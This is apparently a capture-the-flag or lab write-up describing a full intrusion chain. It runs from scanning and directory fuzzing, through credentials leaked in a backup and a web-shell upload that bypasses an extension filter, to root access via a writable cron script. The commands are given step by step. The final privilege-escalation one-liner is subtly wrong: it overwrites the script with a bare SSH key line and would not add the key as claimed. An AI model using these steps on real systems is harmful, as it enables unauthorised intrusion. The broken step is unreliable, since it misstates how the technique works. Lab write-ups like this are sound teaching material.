This lab mirrors the same kind of mistakes as Locker Room: a public file leak, a soft admin panel, and a root job that trusts a writable file. Nothing fancy, just a clean chain.
Recon
I started with a simple scan to keep the surface area tight.
nmap -sC -sV -Pn -oN nmap.txt targetResults (summarized):
- 22/tcp open (SSH)
- 80/tcp open (HTTP)
Web enumeration
The landing page was a basic status dashboard with a note about "maintenance exports". I ran a quick directory probe.
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://target/FUZZ -fs 0Key hit:
/exports/-> 200 with directory listing enabled
Inside /exports/ I found a timestamped backup:
exports_2026_03_15.zip
Unpacking it revealed a config file with an admin login.
ADMIN_USER=ops
ADMIN_PASS=opsonlyFoothold
The creds worked for the dashboard at /admin/. The panel had a "theme upload" feature. Client-side checks blocked .php, but the server accepted double extensions.
cp shell.php theme.css.phpUpload response:
{ "ok": true, "path": "/uploads/themes/theme.css.php" }Visiting the upload path dropped me a shell as the web user.
Privilege escalation
A quick permission sweep showed a writable service script:
ls -la /opt/services/The rotate-logs.sh script was owned by root but writable by the web user. A cron job ran it every minute.
cat /etc/crontabEntry (summarized):
* * * * * root /opt/services/rotate-logs.shI replaced it with a one-liner to add my SSH key.
echo 'ssh-ed25519 AAAA... attacker@box' > /opt/services/rotate-logs.sh
chmod +x /opt/services/rotate-logs.shAfter the next tick, I could SSH in as root.
Takeaways
- Public backup folders leak secrets fast.
- Admin panels often trust client-side validation.
- Writable scripts run by cron are a straight path to root.
This is another solid example of a low-friction chain that shows up in real assessments.